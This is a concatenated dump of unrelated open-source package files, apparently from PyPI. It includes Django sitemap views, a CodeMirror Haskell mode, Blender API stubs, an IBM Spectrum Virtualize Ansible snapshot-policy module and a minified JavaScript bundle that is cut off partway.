/django_linux-2.2.8-py3-none-any.whl/django/contrib/sitemaps/views.py | import datetime
from calendar import timegm
from functools import wraps
from django.contrib.sites.shortcuts import get_current_site
from django.core.paginator import EmptyPage, PageNotAnInteger
from django.http import Http404
from django.template.response import TemplateResponse
from django.urls import reverse
from django.utils.http import http_date
def x_robots_tag(func):
@wraps(func)
def inner(request, *args, **kwargs):
response = func(request, *args, **kwargs)
response['X-Robots-Tag'] = 'noindex, noodp, noarchive'
return response
return inner
@x_robots_tag
def index(request, sitemaps,
template_name='sitemap_index.xml', content_type='application/xml',
sitemap_url_name='django.contrib.sitemaps.views.sitemap'):
req_protocol = request.scheme
req_site = get_current_site(request)
sites = [] # all sections' sitemap URLs
for section, site in sitemaps.items():
# For each section label, add links of all pages of its sitemap
# (usually generated by the `sitemap` view).
if callable(site):
site = site()
protocol = req_protocol if site.protocol is None else site.protocol
sitemap_url = reverse(sitemap_url_name, kwargs={'section': section})
absolute_url = '%s://%s%s' % (protocol, req_site.domain, sitemap_url)
sites.append(absolute_url)
# Add links to all pages of the sitemap.
for page in range(2, site.paginator.num_pages + 1):
sites.append('%s?p=%s' % (absolute_url, page))
return TemplateResponse(request, template_name, {'sitemaps': sites},
content_type=content_type)
@x_robots_tag
def sitemap(request, sitemaps, section=None,
template_name='sitemap.xml', content_type='application/xml'):
req_protocol = request.scheme
req_site = get_current_site(request)
if section is not None:
if section not in sitemaps:
raise Http404("No sitemap available for section: %r" % section)
maps = [sitemaps[section]]
else:
maps = sitemaps.values()
page = request.GET.get("p", 1)
lastmod = None
all_sites_lastmod = True
urls = []
for site in maps:
try:
if callable(site):
site = site()
urls.extend(site.get_urls(page=page, site=req_site,
protocol=req_protocol))
if all_sites_lastmod:
site_lastmod = getattr(site, 'latest_lastmod', None)
if site_lastmod is not None:
site_lastmod = (
site_lastmod.utctimetuple() if isinstance(site_lastmod, datetime.datetime)
else site_lastmod.timetuple()
)
lastmod = site_lastmod if lastmod is None else max(lastmod, site_lastmod)
else:
all_sites_lastmod = False
except EmptyPage:
raise Http404("Page %s empty" % page)
except PageNotAnInteger:
raise Http404("No page '%s'" % page)
response = TemplateResponse(request, template_name, {'urlset': urls},
content_type=content_type)
if all_sites_lastmod and lastmod is not None:
# if lastmod is defined for all sites, set header so as
# ConditionalGetMiddleware is able to send 304 NOT MODIFIED
response['Last-Modified'] = http_date(timegm(lastmod))
return response | PypiClean |
/pytello-hsu-3.0.0.tar.gz/pytello-hsu-3.0.0/README.md | # Read Me
For this to work you need Python 3.6 and above and Windows 10. At the begining of the your file you create you need to add the following command:
import pytello-hsu
Also to get this on your computer you need to do the following command:
pip install pytello-hsu
When programming you must use the "init()" command at the begining of the file if you want the program to work unless you know what your doing and how the program works. To undersand how the program works further look at DOCUMENTATION.md. | PypiClean |
/itch-framework-0.0.1.tar.gz/itch-framework-0.0.1/itch/stage.py | import itch.costume
from itch.event_receiver import EventReceiver
import itch.sprite
import pygame
import itch.data_view
import itch.utils
class DataContainer:
pass
class PendingEvent:
def __init__(self, name, mouse_coords):
self.name = name
self.mouse_coords = mouse_coords
class Stage(EventReceiver):
STAGE_WIDTH = 480
STAGE_HEIGHT = 360
WHITE = (255, 255, 255)
def __init__(self, *image_sources, scheduler):
super().__init__(scheduler)
self._costume = None
self.load_backdrops(*image_sources)
self.sprite_list = []
self.data_container = DataContainer()
self.data_views = []
self._pending_events = []
def load_backdrops(self, *image_sources):
self._costume = itch.costume.Costume(image_sources)
def render_in(self, screen):
screen.fill(Stage.WHITE)
if self._costume.current_image():
screen.blit(self._costume.current_image(), (0, 0))
for sprite in self.sprite_list:
sprite.render_in(screen)
for dv in self.data_views:
dv.render_in(screen)
def switch_backdrop_to(self, name):
self._costume.select_named(name)
self._schedule()
def next_backdrop(self):
self._costume.next_costume()
self._schedule()
def receivers(self):
return [self] + self.sprite_list
def create_sprite(self, x=0, y=0, *image_sources):
sprite = itch.sprite.Sprite(image_sources, x, y, self, self._scheduler)
self.sprite_list.append(sprite)
return sprite
def create_data(self, name, value):
setattr(self.data_container, name, value)
self.data_views.append(itch.data_view.DataView(0, 0, name, self.data_container, self._scheduler))
def receiver_at(self, coords):
underneath = list(filter(lambda s: s.hit_test(coords), self.sprite_list))
if len(underneath) > 0:
return underneath[-1]
else:
return self
def bring_to_front(self, sprite):
self.sprite_list.remove(sprite)
self.sprite_list.append(sprite)
self._schedule()
def send_back_layers(self, sprite, number):
current = self.sprite_list.index(sprite)
new_pos = max(0, current - number)
self.sprite_list.remove(sprite)
self.sprite_list.insert(new_pos, sprite)
self._schedule()
def mask_without_sprite_filtered_by_color(self, no_render_sprite, color):
target = (0, 0, 0, 255)
threshold = (8, 8, 8, 0)
render_surface = pygame.Surface((itch.Stage.STAGE_WIDTH, itch.Stage.STAGE_HEIGHT), pygame.SRCALPHA)
threshold_surface = pygame.Surface((itch.Stage.STAGE_WIDTH, itch.Stage.STAGE_HEIGHT), pygame.SRCALPHA)
if self._costume.current_image():
render_surface.blit(self._costume.current_image(), (0, 0))
for sprite in self.sprite_list:
if sprite != no_render_sprite:
sprite.render_in(render_surface)
pygame.transform.threshold(threshold_surface, render_surface, list(color) + [0], threshold, target, True)
mask = pygame.mask.from_surface(threshold_surface)
mask.invert()
return mask
def broadcast(self, event_name):
self.system_broadcast("when_i_receive_" + event_name)
def system_broadcast(self, event_name):
self._pending_events.append(PendingEvent(event_name, itch.utils.read_mouse()))
def fire_all_events(self):
for pending_event in self._pending_events:
if pending_event.name == "mouse_clicked":
under = self.receiver_at(pending_event.mouse_coords)
if isinstance(under, itch.sprite.Sprite):
under.trigger_event("when_this_sprite_clicked")
else:
under.trigger_event("when_stage_clicked")
else:
for receiver in self.receivers():
receiver.trigger_event(pending_event.name)
self._pending_events.clear()
def run_all_tasks_until_reschedule(self):
for receiver in self.receivers():
receiver.run_tasks_until_reschedule() | PypiClean |
/flask-magic-0.0.53.tar.gz/flask-magic-0.0.53/flask_magic/plugins/publisher/static/Magic/Plugin/Publisher/mdeditor/bower_components/codemirror/mode/haskell/haskell.js | CodeMirror.defineMode("haskell", function() {
function switchState(source, setState, f) {
setState(f);
return f(source, setState);
}
// These should all be Unicode extended, as per the Haskell 2010 report
var smallRE = /[a-z_]/;
var largeRE = /[A-Z]/;
var digitRE = /[0-9]/;
var hexitRE = /[0-9A-Fa-f]/;
var octitRE = /[0-7]/;
var idRE = /[a-z_A-Z0-9']/;
var symbolRE = /[-!#$%&*+.\/<=>?@\\^|~:]/;
var specialRE = /[(),;[\]`{}]/;
var whiteCharRE = /[ \t\v\f]/; // newlines are handled in tokenizer
function normal(source, setState) {
if (source.eatWhile(whiteCharRE)) {
return null;
}
var ch = source.next();
if (specialRE.test(ch)) {
if (ch == '{' && source.eat('-')) {
var t = "comment";
if (source.eat('#')) {
t = "meta";
}
return switchState(source, setState, ncomment(t, 1));
}
return null;
}
if (ch == '\'') {
if (source.eat('\\')) {
source.next(); // should handle other escapes here
}
else {
source.next();
}
if (source.eat('\'')) {
return "string";
}
return "error";
}
if (ch == '"') {
return switchState(source, setState, stringLiteral);
}
if (largeRE.test(ch)) {
source.eatWhile(idRE);
if (source.eat('.')) {
return "qualifier";
}
return "variable-2";
}
if (smallRE.test(ch)) {
source.eatWhile(idRE);
return "variable";
}
if (digitRE.test(ch)) {
if (ch == '0') {
if (source.eat(/[xX]/)) {
source.eatWhile(hexitRE); // should require at least 1
return "integer";
}
if (source.eat(/[oO]/)) {
source.eatWhile(octitRE); // should require at least 1
return "number";
}
}
source.eatWhile(digitRE);
var t = "number";
if (source.eat('.')) {
t = "number";
source.eatWhile(digitRE); // should require at least 1
}
if (source.eat(/[eE]/)) {
t = "number";
source.eat(/[-+]/);
source.eatWhile(digitRE); // should require at least 1
}
return t;
}
if (symbolRE.test(ch)) {
if (ch == '-' && source.eat(/-/)) {
source.eatWhile(/-/);
if (!source.eat(symbolRE)) {
source.skipToEnd();
return "comment";
}
}
var t = "variable";
if (ch == ':') {
t = "variable-2";
}
source.eatWhile(symbolRE);
return t;
}
return "error";
}
function ncomment(type, nest) {
if (nest == 0) {
return normal;
}
return function(source, setState) {
var currNest = nest;
while (!source.eol()) {
var ch = source.next();
if (ch == '{' && source.eat('-')) {
++currNest;
}
else if (ch == '-' && source.eat('}')) {
--currNest;
if (currNest == 0) {
setState(normal);
return type;
}
}
}
setState(ncomment(type, currNest));
return type;
};
}
function stringLiteral(source, setState) {
while (!source.eol()) {
var ch = source.next();
if (ch == '"') {
setState(normal);
return "string";
}
if (ch == '\\') {
if (source.eol() || source.eat(whiteCharRE)) {
setState(stringGap);
return "string";
}
if (source.eat('&')) {
}
else {
source.next(); // should handle other escapes here
}
}
}
setState(normal);
return "error";
}
function stringGap(source, setState) {
if (source.eat('\\')) {
return switchState(source, setState, stringLiteral);
}
source.next();
setState(normal);
return "error";
}
var wellKnownWords = (function() {
var wkw = {};
function setType(t) {
return function () {
for (var i = 0; i < arguments.length; i++)
wkw[arguments[i]] = t;
};
}
setType("keyword")(
"case", "class", "data", "default", "deriving", "do", "else", "foreign",
"if", "import", "in", "infix", "infixl", "infixr", "instance", "let",
"module", "newtype", "of", "then", "type", "where", "_");
setType("keyword")(
"\.\.", ":", "::", "=", "\\", "\"", "<-", "->", "@", "~", "=>");
setType("builtin")(
"!!", "$!", "$", "&&", "+", "++", "-", ".", "/", "/=", "<", "<=", "=<<",
"==", ">", ">=", ">>", ">>=", "^", "^^", "||", "*", "**");
setType("builtin")(
"Bool", "Bounded", "Char", "Double", "EQ", "Either", "Enum", "Eq",
"False", "FilePath", "Float", "Floating", "Fractional", "Functor", "GT",
"IO", "IOError", "Int", "Integer", "Integral", "Just", "LT", "Left",
"Maybe", "Monad", "Nothing", "Num", "Ord", "Ordering", "Rational", "Read",
"ReadS", "Real", "RealFloat", "RealFrac", "Right", "Show", "ShowS",
"String", "True");
setType("builtin")(
"abs", "acos", "acosh", "all", "and", "any", "appendFile", "asTypeOf",
"asin", "asinh", "atan", "atan2", "atanh", "break", "catch", "ceiling",
"compare", "concat", "concatMap", "const", "cos", "cosh", "curry",
"cycle", "decodeFloat", "div", "divMod", "drop", "dropWhile", "either",
"elem", "encodeFloat", "enumFrom", "enumFromThen", "enumFromThenTo",
"enumFromTo", "error", "even", "exp", "exponent", "fail", "filter",
"flip", "floatDigits", "floatRadix", "floatRange", "floor", "fmap",
"foldl", "foldl1", "foldr", "foldr1", "fromEnum", "fromInteger",
"fromIntegral", "fromRational", "fst", "gcd", "getChar", "getContents",
"getLine", "head", "id", "init", "interact", "ioError", "isDenormalized",
"isIEEE", "isInfinite", "isNaN", "isNegativeZero", "iterate", "last",
"lcm", "length", "lex", "lines", "log", "logBase", "lookup", "map",
"mapM", "mapM_", "max", "maxBound", "maximum", "maybe", "min", "minBound",
"minimum", "mod", "negate", "not", "notElem", "null", "odd", "or",
"otherwise", "pi", "pred", "print", "product", "properFraction",
"putChar", "putStr", "putStrLn", "quot", "quotRem", "read", "readFile",
"readIO", "readList", "readLn", "readParen", "reads", "readsPrec",
"realToFrac", "recip", "rem", "repeat", "replicate", "return", "reverse",
"round", "scaleFloat", "scanl", "scanl1", "scanr", "scanr1", "seq",
"sequence", "sequence_", "show", "showChar", "showList", "showParen",
"showString", "shows", "showsPrec", "significand", "signum", "sin",
"sinh", "snd", "span", "splitAt", "sqrt", "subtract", "succ", "sum",
"tail", "take", "takeWhile", "tan", "tanh", "toEnum", "toInteger",
"toRational", "truncate", "uncurry", "undefined", "unlines", "until",
"unwords", "unzip", "unzip3", "userError", "words", "writeFile", "zip",
"zip3", "zipWith", "zipWith3");
return wkw;
})();
return {
startState: function () { return { f: normal }; },
copyState: function (s) { return { f: s.f }; },
token: function(stream, state) {
var t = state.f(stream, function(s) { state.f = s; });
var w = stream.current();
return (w in wellKnownWords) ? wellKnownWords[w] : t;
},
blockCommentStart: "{-",
blockCommentEnd: "-}",
lineComment: "--"
};
});
CodeMirror.defineMIME("text/x-haskell", "haskell"); | PypiClean |
/fake_bpy_module_2.82-20230117-py3-none-any.whl/bl_ui/properties_data_speaker.py | import sys
import typing
import bpy_types
import rna_prop_ui
GenericType = typing.TypeVar("GenericType")
class DataButtonsPanel:
bl_context = None
''' '''
bl_region_type = None
''' '''
bl_space_type = None
''' '''
def poll(self, context):
'''
'''
pass
class DATA_PT_cone(DataButtonsPanel, bpy_types.Panel, bpy_types._GenericUI):
COMPAT_ENGINES = None
''' '''
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class DATA_PT_context_speaker(DataButtonsPanel, bpy_types.Panel,
bpy_types._GenericUI):
COMPAT_ENGINES = None
''' '''
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class DATA_PT_custom_props_speaker(DataButtonsPanel, rna_prop_ui.PropertyPanel,
bpy_types.Panel, bpy_types._GenericUI):
COMPAT_ENGINES = None
''' '''
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_order = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class DATA_PT_distance(DataButtonsPanel, bpy_types.Panel,
bpy_types._GenericUI):
COMPAT_ENGINES = None
''' '''
bl_context = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class DATA_PT_speaker(DataButtonsPanel, bpy_types.Panel, bpy_types._GenericUI):
COMPAT_ENGINES = None
''' '''
bl_context = None
''' '''
bl_label = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass | PypiClean |
/ansible-8.3.0-py3-none-any.whl/ansible_collections/ibm/spectrum_virtualize/plugins/modules/ibm_sv_manage_snapshotpolicy.py |
# Copyright (C) 2022 IBM CORPORATION
# Author(s): Shilpi Jain <shilpi.jain1@ibm.com>
#
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
DOCUMENTATION = '''
---
module: ibm_sv_manage_snapshotpolicy
short_description: This module manages snapshot policy configuration on IBM Spectrum Virtualize family storage systems
version_added: "1.9.0"
description:
- Ansible interface to manage 'mksnapshotpolicy' and 'rmsnapshotpolicy' snapshot policy commands.
- Snapshot policy is introduced in IBM Spectrum Virtualize 8.5.1.0.
options:
clustername:
description:
- The hostname or management IP of the Spectrum Virtualize storage system.
required: true
type: str
domain:
description:
- Domain for the Spectrum Virtualize storage system.
- Valid when hostname is used for the parameter I(clustername).
type: str
username:
description:
- REST API username for the Spectrum Virtualize storage system.
- The parameters I(username) and I(password) are required if not using I(token) to authenticate a user.
type: str
password:
description:
- REST API password for the Spectrum Virtualize storage system.
- The parameters I(username) and I(password) are required if not using I(token) to authenticate a user.
type: str
token:
description:
- The authentication token to verify a user on the Spectrum Virtualize storage system.
- To generate a token, use the M(ibm.spectrum_virtualize.ibm_svc_auth) module.
type: str
log_path:
description:
- Path of debug log file.
type: str
state:
description:
- Creates (C(present)) or deletes (C(absent)) a snapshot policy.
- Resume (C(resume)) or suspend (C(suspend)) the snapshot policy, system-wide.
choices: [ present, absent, suspend, resume ]
required: true
type: str
name:
description:
- Specifies a unique name of the snapshot policy.
- Not applicable when I(state=suspend) or I(state=resume).
type: str
backupunit:
description:
- Specifies the backup unit in mentioned metric.
- Applies when I(state=present).
choices: [ minute, hour, day, week, month ]
type: str
backupinterval:
description:
- Specifies the backup interval.
- Applies when I(state=present).
type: str
backupstarttime:
description:
- Specifies the start time of backup in the format YYMMDDHHMM.
- Applies when I(state=present).
type: str
retentiondays:
description:
- Specifies the retention days for the backup.
- Applies when I(state=present).
type: str
removefromvolumegroups:
description:
- Specify to remove the volume group association from the snapshot policy.
- Applies when I(state=absent).
- This option is allowed only for SecurityAdmin users.
type: bool
validate_certs:
description:
- Validates certification.
default: false
type: bool
author:
- Shilpi Jain(@Shilpi-J)
notes:
- This module supports C(check_mode).
'''
EXAMPLES = '''
- name: Create snapshot policy
ibm.spectrum_virtualize.ibm_sv_manage_snapshotpolicy:
clustername: "{{cluster}}"
username: "{{username}}"
password: "{{password}}"
name: policy0
backupunit: day
backupinterval: 1
backupstarttime: 2102281800
retentiondays: 15
state: present
- name: Suspend snapshot policy functionality
ibm.spectrum_virtualize.ibm_sv_manage_snapshotpolicy:
clustername: "{{cluster}}"
username: "{{username}}"
password: "{{password}}"
state: suspend
- name: Resume snapshot policy functionality
ibm.spectrum_virtualize.ibm_sv_manage_snapshotpolicy:
clustername: "{{cluster}}"
username: "{{username}}"
password: "{{password}}"
state: resume
- name: Delete snapshot policy
ibm.spectrum_virtualize.ibm_sv_manage_snapshotpolicy:
clustername: "{{cluster}}"
username: "{{username}}"
password: "{{password}}"
name: policy0
state: absent
'''
RETURN = '''#'''
from traceback import format_exc
from ansible.module_utils.basic import AnsibleModule
from ansible_collections.ibm.spectrum_virtualize.plugins.module_utils.ibm_svc_utils import (
IBMSVCRestApi, svc_argument_spec,
get_logger
)
from ansible.module_utils._text import to_native
class IBMSVCSnapshotPolicy:
def __init__(self):
argument_spec = svc_argument_spec()
argument_spec.update(
dict(
state=dict(
type='str',
required=True,
choices=['present', 'absent', 'suspend', 'resume']
),
name=dict(
type='str',
),
backupunit=dict(
type='str',
choices=['minute', 'hour', 'day', 'week', 'month'],
),
backupinterval=dict(
type='str',
),
backupstarttime=dict(
type='str',
),
retentiondays=dict(
type='str',
),
removefromvolumegroups=dict(
type='bool'
),
)
)
self.module = AnsibleModule(argument_spec=argument_spec,
supports_check_mode=True)
# Required parameters
self.name = self.module.params['name']
self.state = self.module.params['state']
self.backupunit = self.module.params.get('backupunit', '')
self.backupinterval = self.module.params.get('backupinterval', '')
self.backupstarttime = self.module.params.get('backupstarttime', '')
self.retentiondays = self.module.params.get('retentiondays', '')
self.removefromvolumegroups = self.module.params.get('removefromvolumegroups', False)
self.basic_checks()
# Variable to cache data
self.snapshot_policy_details = None
# logging setup
self.log_path = self.module.params['log_path']
log = get_logger(self.__class__.__name__, self.log_path)
self.log = log.info
self.changed = False
self.msg = ''
self.restapi = IBMSVCRestApi(
module=self.module,
clustername=self.module.params['clustername'],
domain=self.module.params['domain'],
username=self.module.params['username'],
password=self.module.params['password'],
validate_certs=self.module.params['validate_certs'],
log_path=self.log_path,
token=self.module.params['token']
)
def basic_checks(self):
if self.state == 'present':
fields = ['name', 'backupinterval', 'backupstarttime', 'retentiondays', 'backupunit']
exists = list(filter(lambda x: not getattr(self, x), fields))
if any(exists):
self.module.fail_json(
msg="State is present but following parameters are missing: {0}".format(', '.join(exists))
)
if self.removefromvolumegroups:
self.module.fail_json(
msg="`removefromvolumegroups` parameter is not supported when state=present"
)
elif self.state == 'absent':
if not self.name:
self.module.fail_json(msg="Missing mandatory parameter: name")
fields = ['backupinterval', 'backupstarttime', 'retentiondays', 'backupunit']
exists = list(filter(lambda x: getattr(self, x) or getattr(self, x) == '', fields))
if any(exists):
self.module.fail_json(msg='{0} should not be passed when state=absent'.format(', '.join(exists)))
elif self.state in ['suspend', 'resume']:
fields = ['name', 'backupinterval', 'backupstarttime', 'retentiondays', 'backupunit']
exists = list(filter(lambda x: getattr(self, x) or getattr(self, x) == '', fields))
if any(exists):
self.module.fail_json(msg='{0} should not be passed when state={1}'.format(', '.join(exists), self.state))
def policy_exists(self):
merged_result = {}
data = self.restapi.svc_obj_info(
cmd='lssnapshotschedule',
cmdopts=None,
cmdargs=[self.name]
)
if isinstance(data, list):
for d in data:
merged_result.update(d)
else:
merged_result = data
self.snapshot_policy_details = merged_result
return merged_result
def create_snapshot_policy(self):
if self.module.check_mode:
self.changed = True
return
cmd = 'mksnapshotpolicy'
cmdopts = {
'name': self.name,
'backupstarttime': self.backupstarttime,
'backupinterval': self.backupinterval,
'backupunit': self.backupunit,
'retentiondays': self.retentiondays
}
self.restapi.svc_run_command(cmd, cmdopts, cmdargs=None)
self.log('Snapshot policy (%s) created', self.name)
self.changed = True
def snapshot_policy_probe(self):
field_mappings = (
('backupinterval', self.snapshot_policy_details['backup_interval']),
('backupstarttime', self.snapshot_policy_details['backup_start_time']),
('retentiondays', self.snapshot_policy_details['retention_days']),
('backupunit', self.snapshot_policy_details['backup_unit'])
)
updates = []
for field, existing_value in field_mappings:
if field == 'backupstarttime':
updates.append(existing_value != '{0}00'.format(getattr(self, field)))
else:
updates.append(existing_value != getattr(self, field))
return updates
def delete_snapshot_policy(self):
if self.module.check_mode:
self.changed = True
return
cmd = 'rmsnapshotpolicy'
cmdargs = [self.name]
cmdopts = None
if self.removefromvolumegroups:
cmdopts = {
'removefromvolumegroups': True
}
self.restapi.svc_run_command(cmd, cmdopts=cmdopts, cmdargs=cmdargs)
self.log('Snapshot policy (%s) deleted', self.name)
self.changed = True
def update_snapshot_scheduler(self):
if self.module.check_mode:
self.changed = True
return
cmd = 'chsystem'
cmdopts = {'snapshotpolicysuspended': 'yes' if self.state == 'suspend' else 'no'}
self.restapi.svc_run_command(cmd, cmdopts=cmdopts, cmdargs=None)
self.log('Snapshot scheduler status changed: %s', self.state)
self.changed = True
def apply(self):
if self.state in ['resume', 'suspend']:
self.update_snapshot_scheduler()
self.msg = 'Snapshot scheduler {0}ed'.format(self.state.rstrip('e'))
else:
if self.policy_exists():
if self.state == 'present':
modifications = self.snapshot_policy_probe()
if any(modifications):
self.msg = 'Policy modification is not supported in ansible. Please delete and recreate new policy.'
else:
self.msg = 'Snapshot policy ({0}) already exists. No modifications done.'.format(self.name)
else:
self.delete_snapshot_policy()
self.msg = 'Snapshot policy ({0}) deleted.'.format(self.name)
else:
if self.state == 'absent':
self.msg = 'Snapshot policy ({0}) does not exist. No modifications done.'.format(self.name)
else:
self.create_snapshot_policy()
self.msg = 'Snapshot policy ({0}) created.'.format(self.name)
if self.module.check_mode:
self.msg = 'skipping changes due to check mode.'
self.module.exit_json(
changed=self.changed,
msg=self.msg
)
def main():
v = IBMSVCSnapshotPolicy()
try:
v.apply()
except Exception as e:
v.log("Exception in apply(): \n%s", format_exc())
v.module.fail_json(msg="Module failed. Error [%s]." % to_native(e))
if __name__ == '__main__':
main() | PypiClean |
/vais-frontend-20220519051104.tar.gz/vais-frontend-20220519051104/vais_frontend/c.ed246a19.js | import{aD as t,a7 as e,aE as i,aF as o,aG as s,Q as n,S as a,aH as r,aI as l,aJ as d,a as c,f as h,e as p,$ as u,r as f,n as g,o as v,m as y,aK as m,af as _,aL as b,c as w,aM as k,aN as x,aO as z,d as T}from"./main-e088bb19.js";import{i as S}from"./c.4cc25ce4.js";import{a as R}from"./c.166c4b5c.js";import"./c.e9faf9fb.js";import{c as E,I as C}from"./c.06c5e585.js";import"./c.ceb1e431.js";import{b as $}from"./c.fcc8c8a6.js";import{s as L}from"./c.6d4d84f1.js";import"./c.73230ac7.js";import"./c.743a15a1.js";import"./c.3c6412dd.js";import"./c.d8002660.js";var D=new Set;const H=[{properties:{_parentResizable:{type:Object,observer:"_parentResizableChanged"},_notifyingDescendant:{type:Boolean,value:!1}},listeners:{"iron-request-resize-notifications":"_onIronRequestResizeNotifications"},created:function(){this._interestedResizables=[],this._boundNotifyResize=this.notifyResize.bind(this),this._boundOnDescendantIronResize=this._onDescendantIronResize.bind(this)},attached:function(){this._requestResizeNotifications()},detached:function(){this._parentResizable?this._parentResizable.stopResizeNotificationsFor(this):(D.delete(this),window.removeEventListener("resize",this._boundNotifyResize)),this._parentResizable=null},notifyResize:function(){this.isAttached&&(this._interestedResizables.forEach((function(t){this.resizerShouldNotify(t)&&this._notifyDescendant(t)}),this),this._fireResize())},assignParentResizable:function(t){this._parentResizable&&this._parentResizable.stopResizeNotificationsFor(this),this._parentResizable=t,t&&-1===t._interestedResizables.indexOf(this)&&(t._interestedResizables.push(this),t._subscribeIronResize(this))},stopResizeNotificationsFor:function(t){var 